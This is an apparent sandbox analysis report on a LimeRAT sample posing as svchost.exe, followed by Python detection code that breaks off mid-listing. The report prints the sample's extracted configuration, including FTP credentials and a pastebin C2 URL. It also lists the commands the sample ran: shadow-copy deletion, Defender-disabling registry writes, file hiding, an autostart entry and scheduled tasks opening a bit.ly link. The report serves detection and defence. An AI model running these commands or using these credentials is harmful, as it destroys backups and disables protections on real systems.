Analysis
max time kernel: 190s
max time network: 169s
platform: windows10-2004_x64
resource: win10v2004-20240611-en
resource tags: arch:x64, arch:x86, image:win10v2004-20240611-en, locale:en-us, os:windows10-2004-x64, system
submitted: 19-06-2024 22:02
Behavioral task behavioral1: Sample svchost.exe, Resource win10-20240404-en
Behavioral task behavioral2: Sample svchost.exe, Resource win10v2004-20240611-en
General
Target: svchost.exe
Size: 242KB
MD5: 05e991bcf019b487f7ad4e896c77e988
SHA1: f4a93e4ce16dba10cdc835fe1ae71da3dd88f73a
SHA256: cb87011623c7e41c0a449814e76c887543e6e39e6ab3864c7cc3636dcf09e196
SHA512: 4f4ee0153af79dbb6352b1382cbee3b5af72c64f827450d2a681fd2b3177304ac1c6626c055159facb84aca9f8ba6aa9d1265d5fb148080e566903949081cfb3
SSDEEP: 6144:GpCE/UVPy/oCa+LDZWC9z5B0bmknq1difFN:6CzPygCa+DZ+nq1cT
Malware Config
Extracted
Protocol: ftp
Host: ftp.encompossoftware.com
Port: 21
Username: remoteuser
Password: Encomposx99
Extracted
limerat
False
aes_key: 1
antivm: false
c2_url: https://pastebin.com/raw/GfV4LBjE
download_payload: true
install: true
install_name: svchost.exe
main_folder: False
payload_url: True
pin_spread: true
sub_folder: False
usb_spread: false
Signatures
Contains code to disable Windows Defender (2 IoCs)
A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.
resource | yara_rule
behavioral2/memory/3084-0-0x0000026BF9F60000-0x0000026BF9FA2000-memory.dmp | disable_win_def
behavioral2/files/0x000400000001da7a-23.dat | disable_win_def
Modifies Windows Defender Real-time Protection settings (4 IoCs)
description | ioc | Process
Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | svchost.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | svchost.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | svchost.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | svchost.exe
Modifies security service (2 TTPs, 1 IoC)
description | ioc | Process
Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Start = "4" | svchost.exe
Modifies visibility of file extensions in Explorer (2 TTPs, 1 IoC)
description | ioc | Process
Set value (int) | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | svchost.exe
Modifies visibility of hidden/system files in Explorer (2 TTPs, 1 IoC)
description | ioc | Process
Set value (int) | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" | svchost.exe
Deletes shadow copies (3 TTPs)
Ransomware often targets backup files to inhibit system recovery.
Checks computer location settings (2 TTPs, 1 IoC)
Looks up country code configured in the registry, likely geofence.
description | ioc | Process
Key value queried | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\Control Panel\International\Geo\Nation | svchost.exe
Executes dropped EXE (1 IoC)
pid | Process
280 | svchost.exe
Enumerates connected drives (3 TTPs, 15 IoCs)
Attempts to read the root path of hard drives other than the default C: drive.
description | ioc | Process
File opened (read-only) | \??\E: | vssadmin.exe
File opened (read-only) | \??\g: | vssadmin.exe
File opened (read-only) | \??\H: | vssadmin.exe
File opened (read-only) | \??\E: | vssadmin.exe
File opened (read-only) | \??\G: | vssadmin.exe
File opened (read-only) | \??\D: | vssadmin.exe
File opened (read-only) | \??\h: | vssadmin.exe
File opened (read-only) | \??\h: | vssadmin.exe
File opened (read-only) | \??\H: | vssadmin.exe
File opened (read-only) | \??\G: | vssadmin.exe
File opened (read-only) | \??\F: | vssadmin.exe
File opened (read-only) | \??\e: | vssadmin.exe
File opened (read-only) | \??\F: | vssadmin.exe
File opened (read-only) | \??\e: | vssadmin.exe
File opened (read-only) | \??\g: | vssadmin.exe
Legitimate hosting services abused for malware hosting/C2 (1 TTP, 4 IoCs)
flow | ioc
24 | iplogger.org
25 | iplogger.org
53 | pastebin.com
58 | pastebin.com
Hide Artifacts: Hidden Files and Directories (1 TTP, 2 IoCs)
pid | Process
2308 | cmd.exe
2824 | cmd.exe
Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s).
Checks SCSI registry key(s) (3 TTPs, 3 IoCs)
SCSI information is often read in order to detect sandboxing environments.
description | ioc | Process
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 | taskmgr.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | taskmgr.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName | taskmgr.exe
Disables Windows logging functionality (2 TTPs)
Changes registry settings to disable Windows Event logging.
Interacts with shadow copies (3 TTPs, 12 IoCs)
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid | Process
2228 | vssadmin.exe
1056 | vssadmin.exe
4456 | vssadmin.exe
2964 | vssadmin.exe
4320 | vssadmin.exe
2896 | vssadmin.exe
1868 | vssadmin.exe
3540 | vssadmin.exe
4088 | vssadmin.exe
1832 | vssadmin.exe
2988 | vssadmin.exe
2020 | vssadmin.exe
Scheduled Task/Job: Scheduled Task (1 TTP, 5 IoCs)
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid | Process
2312 | schtasks.exe
1656 | schtasks.exe
2992 | schtasks.exe
3620 | schtasks.exe
4700 | schtasks.exe
Suspicious behavior: EnumeratesProcesses (64 IoCs)
pid | Process (64 rows in the source, one per event; unique processes listed)
3084 | svchost.exe
3208 | powershell.exe
280 | svchost.exe
4376 | taskmgr.exe
Suspicious use of AdjustPrivilegeToken (14 IoCs)
description | pid | Process
Token: SeDebugPrivilege | 3084 | svchost.exe
Token: SeDebugPrivilege | 3208 | powershell.exe
Token: SeBackupPrivilege | 2028 | vssvc.exe
Token: SeRestorePrivilege | 2028 | vssvc.exe
Token: SeAuditPrivilege | 2028 | vssvc.exe
Token: SeBackupPrivilege | 3084 | svchost.exe
Token: SeSecurityPrivilege | 3084 | svchost.exe
Token: SeBackupPrivilege | 3084 | svchost.exe
Token: SeDebugPrivilege | 280 | svchost.exe
Token: SeDebugPrivilege | 4376 | taskmgr.exe
Token: SeSystemProfilePrivilege | 4376 | taskmgr.exe
Token: SeCreateGlobalPrivilege | 4376 | taskmgr.exe
Token: 33 | 4376 | taskmgr.exe
Token: SeIncBasePriorityPrivilege | 4376 | taskmgr.exe
Suspicious use of FindShellTrayWindow (64 IoCs)
pid | Process (64 rows in the source, all the same process)
4376 | taskmgr.exe
Suspicious use of SendNotifyMessage (64 IoCs)
pid | Process (64 rows in the source, all the same process)
4376 | taskmgr.exe
Suspicious use of WriteProcessMemory (64 IoCs)
description | pid | Process | procid_target (each pair is logged twice in the source, 64 rows in total)
PID 3084 wrote to memory of 2824 | 3084 | svchost.exe | 86
PID 2824 wrote to memory of 4716 | 2824 | cmd.exe | 88
PID 2824 wrote to memory of 4404 | 2824 | cmd.exe | 89
PID 3084 wrote to memory of 3208 | 3084 | svchost.exe | 92
PID 3084 wrote to memory of 1308 | 3084 | svchost.exe | 95
PID 3084 wrote to memory of 2504 | 3084 | svchost.exe | 96
PID 3084 wrote to memory of 3804 | 3084 | svchost.exe | 97
PID 3084 wrote to memory of 888 | 3084 | svchost.exe | 98
PID 3084 wrote to memory of 3128 | 3084 | svchost.exe | 99
PID 3084 wrote to memory of 2464 | 3084 | svchost.exe | 100
PID 3084 wrote to memory of 2520 | 3084 | svchost.exe | 101
PID 3084 wrote to memory of 752 | 3084 | svchost.exe | 102
PID 3084 wrote to memory of 1652 | 3084 | svchost.exe | 103
PID 3084 wrote to memory of 532 | 3084 | svchost.exe | 104
PID 3084 wrote to memory of 3776 | 3084 | svchost.exe | 105
PID 3084 wrote to memory of 1484 | 3084 | svchost.exe | 106
PID 3084 wrote to memory of 4284 | 3084 | svchost.exe | 107
PID 888 wrote to memory of 3540 | 888 | cmd.exe | 121
PID 3128 wrote to memory of 4088 | 3128 | cmd.exe | 122
PID 2520 wrote to memory of 1056 | 2520 | cmd.exe | 123
PID 1308 wrote to memory of 4456 | 1308 | cmd.exe | 125
PID 3804 wrote to memory of 1832 | 3804 | cmd.exe | 126
PID 532 wrote to memory of 2988 | 532 | cmd.exe | 127
PID 1484 wrote to memory of 2964 | 1484 | cmd.exe | 128
PID 2504 wrote to memory of 3044 | 2504 | cmd.exe | 129
PID 1652 wrote to memory of 4320 | 1652 | cmd.exe | 132
PID 3776 wrote to memory of 2020 | 3776 | cmd.exe | 131
PID 2464 wrote to memory of 2228 | 2464 | cmd.exe | 130
PID 752 wrote to memory of 2896 | 752 | cmd.exe | 133
PID 4284 wrote to memory of 1868 | 4284 | cmd.exe | 134
PID 3084 wrote to memory of 2992 | 3084 | svchost.exe | 138
PID 3084 wrote to memory of 3620 | 3084 | svchost.exe | 139
System policy modification (1 TTP, 3 IoCs)
description | ioc | Process
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Run\svchost.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Branding\\svchost.exe" | svchost.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Run\svchost.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Branding\\svchost.exe" | svchost.exe
Key created | \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Run | svchost.exe
Uses Task Scheduler COM API (1 TTP)
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Views/modifies file attributes (1 TTP, 4 IoCs)
pid | Process
4716 | attrib.exe
4404 | attrib.exe
2968 | attrib.exe
1908 | attrib.exe
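The registry rows above (the Defender Real-Time Protection policy values, wscsvc Start=4, the two Explorer\Advanced values, the Policies\Run entry and the Geo\Nation read) can be classified mechanically. The following is an added example, not code from this report or from LimeRAT: it parses rows in exactly the shape the report prints them, converts the kernel object paths the sandbox logs (\REGISTRY\MACHINE, \REGISTRY\USER\<SID>, ControlSet001) to the hive names that live-host detection rules are usually written against (HKLM, HKU\<SID>, CurrentControlSet), de-duplicates the writes the sandbox records twice, and maps each write to the defence it impairs. SAMPLE_EVENTS is constructed from the rows of this report; the RULES table and its ATT&CK mapping are this example's own assumptions. Two values worth knowing when reading the rows: Start = 4 on a service is SERVICE_DISABLED, so the Security Center service will not start on the next boot, and HideFileExt = 1 / ShowSuperHidden = 0 are the settings that make a dropped file carrying the +H +S attributes and an .exe extension vanish from Explorer.

```python
"""Classify the registry IoCs of a sandbox report by the defence they impair.

Added example, not code from this report or from LimeRAT. It parses rows in the
shape the Signatures section uses, normalises the kernel object paths the sandbox
logs (\\REGISTRY\\MACHINE, \\REGISTRY\\USER\\<SID>, ControlSet001) to the hive names
detection rules are written against, and maps known writes to ATT&CK techniques.
SAMPLE_EVENTS is constructed from this report's rows; RULES is this example's own.
"""
import re
from collections import namedtuple
from typing import Iterable, List, Optional

EVENT_RE = re.compile(
    r'^(?P<op>Set value \((?:int|str)\)|Key created|Key value queried)\s+'
    r'(?P<path>\\REGISTRY\\.+?)'          # lazy: stops before ' = "..."' or the process name
    r'(?:\s+=\s+"(?P<value>.*)")?'
    r'\s+(?P<proc>[\w.-]+\.exe)$')
SID_RE = re.compile(r'^hku\\s-1-5-21(?:-\d+)+\\')
DEFENDER_RTP = r'^hklm\\software\\policies\\microsoft\\windows defender\\real-time protection$'
EXPLORER_ADV = r'^hku\\<sid>\\software\\microsoft\\windows\\currentversion\\explorer\\advanced$'
# (operation, key regex, value-name regex, is the written value the bad one?, technique, description)
RULES = [
    ('Key created', DEFENDER_RTP, r'^$', lambda v: True, 'T1562.001',
     'Defender Real-Time Protection policy key created (absent on a stock host)'),
    ('Set value', DEFENDER_RTP, r'^disable\w+$', lambda v: v == '1', 'T1562.001',
     'Defender real-time feature switched off by policy'),
    ('Set value', r'^hklm\\system\\currentcontrolset\\services\\wscsvc$', r'^start$', lambda v: v == '4',
     'T1562.001', 'Security Center service set to SERVICE_DISABLED (Start=4)'),
    ('Set value', EXPLORER_ADV, r'^hidefileext$', lambda v: v == '1', 'T1564.001',
     'Explorer hides file extensions (a dropped "svchost.exe" shows as "svchost")'),
    ('Set value', EXPLORER_ADV, r'^showsuperhidden$', lambda v: v == '0', 'T1564.001',
     'Explorer hides protected operating-system files (+H +S files disappear)'),
    ('Set value', r'^hklm\\software\\microsoft\\windows\\currentversion\\policies\\run$', r'.+', lambda v: True,
     'T1547.001', 'Machine-wide Policies\\Run autostart entry'),
    ('Key value queried', r'^hku\\<sid>\\control panel\\international\\geo$', r'^nation$', lambda v: True,
     'T1614', 'Configured country code read (geofencing check)'),
]
RegEvent = namedtuple('RegEvent', 'op key name value process')   # key: normalised, lower-case
Finding = namedtuple('Finding', 'technique description event')


def normalise_key(raw: str) -> str:
    """\\REGISTRY\\MACHINE -> hklm, \\REGISTRY\\USER\\S-1-5-21-... -> hku\\<sid>, ControlSetNNN -> currentcontrolset."""
    key = raw.lower().replace('\\registry\\machine\\', 'hklm\\', 1).replace('\\registry\\user\\', 'hku\\', 1)
    key = SID_RE.sub(lambda _: 'hku\\<sid>\\', key)              # callables sidestep re's backslash escapes
    return re.sub(r'\\controlset\d{3}\\', lambda _: '\\currentcontrolset\\', key)


def parse_event(line: str) -> Optional[RegEvent]:
    m = EVENT_RE.match(line.strip())
    if not m:
        return None
    path, proc = normalise_key(m.group('path')), m.group('proc')
    if m.group('op') == 'Key created':
        return RegEvent('Key created', path, '', '', proc)
    key, _, name = path.rpartition('\\')                         # last component is the value name
    op = 'Set value' if m.group('op').startswith('Set value') else m.group('op')
    value = (m.group('value') or '').replace('\\\\', '\\')       # the report doubles backslashes in str data
    return RegEvent(op, key, name, value, proc)


def classify(lines: Iterable[str]) -> List[Finding]:
    findings, seen = [], set()
    for line in lines:
        ev = parse_event(line)
        if ev is None or ev in seen:                             # the sandbox records some writes twice
            continue
        seen.add(ev)
        for op, key_re, name_re, is_bad, technique, description in RULES:
            if ev.op == op and re.match(key_re, ev.key) and re.match(name_re, ev.name) and is_bad(ev.value):
                findings.append(Finding(technique, description, ev))
    return findings


SAMPLE_EVENTS = [  # constructed from the rows in this report's Signatures section
    r'Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection svchost.exe',
    r'Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" svchost.exe',
    r'Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" svchost.exe',
    r'Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" svchost.exe',
    r'Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Start = "4" svchost.exe',
    r'Set value (int) \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" svchost.exe',
    r'Set value (int) \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" svchost.exe',
    r'Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Run\svchost.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Branding\\svchost.exe" svchost.exe',
    r'Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Run\svchost.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Branding\\svchost.exe" svchost.exe',
    r'Key created \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Run svchost.exe',
    r'Key value queried \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\Control Panel\International\Geo\Nation svchost.exe',
]

if __name__ == '__main__':
    for f in classify(SAMPLE_EVENTS):
        print(f.technique, f.event.process, f.event.key, f.event.name, repr(f.event.value), '->', f.description)
```

Run on the sample rows it yields nine findings: five under T1562.001 (the policy key creation, the three Disable* values and wscsvc), two under T1564.001, the Policies\Run autostart under T1547.001 and the country-code read under T1614. The same rule table can be pointed at live-host telemetry once the paths are normalised the same way; the one adjustment needed there is that EDR products already report HKLM\SYSTEM\CurrentControlSet, whereas the sandbox shows the concrete ControlSet001.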
Processes
[1] C:\Users\Admin\AppData\Local\Temp\svchost.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\svchost.exe"
    PID: 3084
    - Modifies Windows Defender Real-time Protection settings
    - Modifies security service
    - Checks computer location settings
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    - System policy modification
  [2] C:\Windows\SYSTEM32\cmd.exe
      Command line: cmd /c attrib +H +S "C:\Users\Admin\AppData\Roaming\\Branding" & attrib +H +S "C:\Users\Admin\AppData\Roaming\\Branding\*" /S /D
      PID: 2824
      - Hide Artifacts: Hidden Files and Directories
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\attrib.exe
        Command line: attrib +H +S "C:\Users\Admin\AppData\Roaming\\Branding"
        PID: 4716
        - Views/modifies file attributes
    [3] C:\Windows\system32\attrib.exe
        Command line: attrib +H +S "C:\Users\Admin\AppData\Roaming\\Branding\*" /S /D
        PID: 4404
        - Views/modifies file attributes
  [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: "powershell" Get-MpPreference -verbose
      PID: 3208
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
  [2] C:\Windows\SYSTEM32\cmd.exe
      Command line: cmd /c vssadmin Delete Shadows /all /quiet
      PID: 1308
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\vssadmin.exe
        Command line: vssadmin Delete Shadows /all /quiet
        PID: 4456
        - Interacts with shadow copies
  [2] C:\Windows\SYSTEM32\cmd.exe
      Command line: cmd /c vssadmin resize shadow /for=c: /on=c: /maxsize=401MB
      PID: 2504
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\vssadmin.exe
        Command line: vssadmin resize shadow /for=c: /on=c: /maxsize=401MB
        PID: 3044
  [2] C:\Windows\SYSTEM32\cmd.exe
      Command line: cmd /c vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
      PID: 3804
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\vssadmin.exe
        Command line: vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
        PID: 1832
        - Interacts with shadow copies
  [2] C:\Windows\SYSTEM32\cmd.exe
      Command line: cmd /c vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded
      PID: 888
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\vssadmin.exe
        Command line: vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded
        PID: 3540
        - Enumerates connected drives
        - Interacts with shadow copies
  [2] C:\Windows\SYSTEM32\cmd.exe
      Command line: cmd /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
      PID: 3128
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\vssadmin.exe
        Command line: vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
        PID: 4088
        - Enumerates connected drives
        - Interacts with shadow copies
  [2] C:\Windows\SYSTEM32\cmd.exe
      Command line: cmd /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded
      PID: 2464
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\vssadmin.exe
        Command line: vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded
        PID: 2228
        - Enumerates connected drives
        - Interacts with shadow copies
  [2] C:\Windows\SYSTEM32\cmd.exe
      Command line: cmd /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB
      PID: 2520
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\vssadmin.exe
        Command line: vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB
        PID: 1056
        - Enumerates connected drives
        - Interacts with shadow copies
  [2] C:\Windows\SYSTEM32\cmd.exe
      Command line: cmd /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded
      PID: 752
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\vssadmin.exe
        Command line: vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded
        PID: 2896
        - Enumerates connected drives
        - Interacts with shadow copies
  [2] C:\Windows\SYSTEM32\cmd.exe
      Command line: cmd /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB
      PID: 1652
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\vssadmin.exe
        Command line: vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB
        PID: 4320
        - Enumerates connected drives
        - Interacts with shadow copies
  [2] C:\Windows\SYSTEM32\cmd.exe
      Command line: cmd /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded
      PID: 532
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\vssadmin.exe
        Command line: vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded
        PID: 2988
        - Enumerates connected drives
        - Interacts with shadow copies
  [2] C:\Windows\SYSTEM32\cmd.exe
      Command line: cmd /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB
      PID: 3776
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\vssadmin.exe
        Command line: vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB
        PID: 2020
        - Enumerates connected drives
        - Interacts with shadow copies
  [2] C:\Windows\SYSTEM32\cmd.exe
      Command line: cmd /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
      PID: 1484
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\vssadmin.exe
        Command line: vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
        PID: 2964
        - Enumerates connected drives
        - Interacts with shadow copies
  [2] C:\Windows\SYSTEM32\cmd.exe
      Command line: cmd /c Vssadmin delete shadowstorage /all /quiet
      PID: 4284
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\vssadmin.exe
        Command line: Vssadmin delete shadowstorage /all /quiet
        PID: 1868
        - Interacts with shadow copies
  [2] C:\Windows\SYSTEM32\schtasks.exe
      Command line: schtasks /create /f /st "11:59" /sc daily /mo "1" /tn "AD RMS Rights Policy Template Management (Automated)" /tr "'explorer'https://bit.ly/3hfQB4H"
      PID: 2992
      - Scheduled Task/Job: Scheduled Task
  [2] C:\Windows\SYSTEM32\schtasks.exe
      Command line: schtasks /create /f /st "08:33" /sc daily /mo "3" /tn "AD RMS Rights Policy Template Management (Automated)" /tr "'explorer'https://bit.ly/3hfQB4H"
      PID: 3620
      - Scheduled Task/Job: Scheduled Task
  [2] C:\Windows\SYSTEM32\schtasks.exe
      Command line: schtasks /create /f /st "10:17" /sc daily /mo "5" /tn "AD RMS Rights Policy Template Management (Automated)" /tr "'explorer'https://bit.ly/3hfQB4H"
      PID: 4700
      - Scheduled Task/Job: Scheduled Task
  [2] C:\Windows\SYSTEM32\schtasks.exe
      Command line: schtasks /create /f /st "10:36" /sc weekly /mo "2" /d "Sat" /tn "AD RMS Rights Policy Template Management (Automated)" /tr "'explorer'https://bit.ly/3hfQB4H"
      PID: 1656
      - Scheduled Task/Job: Scheduled Task
  [2] C:\Windows\SYSTEM32\schtasks.exe
      Command line: schtasks /create /f /st "03:18" /sc monthly /m "may" /tn "AD RMS Rights Policy Template Management (Automated)" /tr "'explorer'https://bit.ly/3hfQB4H"
      PID: 2312
      - Scheduled Task/Job: Scheduled Task
  [2] C:\Users\Admin\AppData\Roaming\Branding\svchost.exe
      Command line: "C:\Users\Admin\AppData\Roaming\Branding\svchost.exe"
      PID: 280
      - Modifies visibility of file extensions in Explorer
      - Modifies visibility of hidden/system files in Explorer
      - Executes dropped EXE
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - System policy modification
    [3] C:\Windows\SYSTEM32\cmd.exe
        Command line: cmd /c attrib +H +S "C:\Users\Admin\AppData\Roaming\\Branding" & attrib +H +S "C:\Users\Admin\AppData\Roaming\\Branding\*" /S /D
        PID: 2308
        - Hide Artifacts: Hidden Files and Directories
      [4] C:\Windows\system32\attrib.exe
          Command line: attrib +H +S "C:\Users\Admin\AppData\Roaming\\Branding"
          PID: 2968
          - Views/modifies file attributes
      [4] C:\Windows\system32\attrib.exe
          Command line: attrib +H +S "C:\Users\Admin\AppData\Roaming\\Branding\*" /S /D
          PID: 1908
          - Views/modifies file attributes
[1] C:\Windows\system32\vssvc.exe
    Command line: C:\Windows\system32\vssvc.exe
    PID: 2028
    - Suspicious use of AdjustPrivilegeToken
[1] C:\Windows\system32\taskmgr.exe
    Command line: "C:\Windows\system32\taskmgr.exe" /4
    PID: 4376
    - Checks SCSI registry key(s)
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
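Three things in the tree above are worth checking for explicitly rather than just counting vssadmin launches. First, `vssadmin resize shadow` (PID 3044) is not a vssadmin subcommand (the tool has `resize shadowstorage`, `delete shadows`, `delete shadowstorage` and so on), so that call fails; the report tagging PID 3044 with no shadow-copy signature while its siblings carry "Interacts with shadow copies" is consistent with that. Second, the per-volume pairs `resize shadowstorage /maxsize=401MB` followed by `/maxsize=unbounded` are the shrink-then-grow trick: a quota below the space the existing shadow copies occupy forces the oldest copies to be deleted, and the unbounded resize afterwards puts the quota back so `vssadmin list shadowstorage` looks untouched. Third, `schtasks /create /f` with the same /tn replaces any task of that name, so the five definitions above leave exactly one registered task, whichever ran last. The following is an added example, not code from this report or from LimeRAT, that encodes those checks: it walks a (pid, parent pid, image, command line) table constructed from a subset of the tree, attributes each finding past the cmd.exe wrapper to the process that chose the command, and flags svchost.exe images outside the system directories. VSSADMIN_SUBCOMMANDS is an assumption drawn from `vssadmin /?` (client SKUs expose only part of it), and the ATT&CK IDs are this example's mapping, not the sandbox's.

```python
"""Flag shadow-copy, scheduled-task, hiding and masquerading commands in a process tree.

Added example, not code from this report or from LimeRAT. PROCESSES is constructed
from a subset of the report's Processes section. VSSADMIN_SUBCOMMANDS is an
assumption taken from `vssadmin /?`; the technique IDs are this example's mapping.
"""
import re
from collections import defaultdict, namedtuple
from typing import Dict, List, Optional, Sequence, Tuple

CMD, VSS, SCH = r'C:\Windows\SYSTEM32\cmd.exe', r'C:\Windows\system32\vssadmin.exe', r'C:\Windows\SYSTEM32\schtasks.exe'
TASK = '/tn "AD RMS Rights Policy Template Management (Automated)" /tr "\'explorer\'https://bit.ly/3hfQB4H"'
PROCESSES: List[Tuple[int, int, str, str]] = [   # (pid, ppid, image, cmdline), constructed from the report's tree
    (3084, 0, r'C:\Users\Admin\AppData\Local\Temp\svchost.exe', r'"C:\Users\Admin\AppData\Local\Temp\svchost.exe"'),
    (2824, 3084, CMD, r'cmd /c attrib +H +S "C:\Users\Admin\AppData\Roaming\\Branding"'),
    (4716, 2824, r'C:\Windows\system32\attrib.exe', r'attrib +H +S "C:\Users\Admin\AppData\Roaming\\Branding"'),
    (3208, 3084, r'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe', '"powershell" Get-MpPreference -verbose'),
    (1308, 3084, CMD, 'cmd /c vssadmin Delete Shadows /all /quiet'),
    (4456, 1308, VSS, 'vssadmin Delete Shadows /all /quiet'),
    (2504, 3084, CMD, 'cmd /c vssadmin resize shadow /for=c: /on=c: /maxsize=401MB'),
    (3044, 2504, VSS, 'vssadmin resize shadow /for=c: /on=c: /maxsize=401MB'),
    (3128, 3084, CMD, 'cmd /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB'),
    (4088, 3128, VSS, 'vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB'),
    (2464, 3084, CMD, 'cmd /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded'),
    (2228, 2464, VSS, 'vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded'),
    (4284, 3084, CMD, 'cmd /c Vssadmin delete shadowstorage /all /quiet'),
    (1868, 4284, VSS, 'Vssadmin delete shadowstorage /all /quiet'),
    (2992, 3084, SCH, 'schtasks /create /f /st "11:59" /sc daily /mo "1" ' + TASK),
    (280, 3084, r'C:\Users\Admin\AppData\Roaming\Branding\svchost.exe', r'"C:\Users\Admin\AppData\Roaming\Branding\svchost.exe"'),
]
VSSADMIN_SUBCOMMANDS = {('add', 'shadowstorage'), ('create', 'shadow'), ('delete', 'shadows'), ('delete', 'shadowstorage'),
                        ('list', 'providers'), ('list', 'shadows'), ('list', 'shadowstorage'), ('list', 'volumes'),
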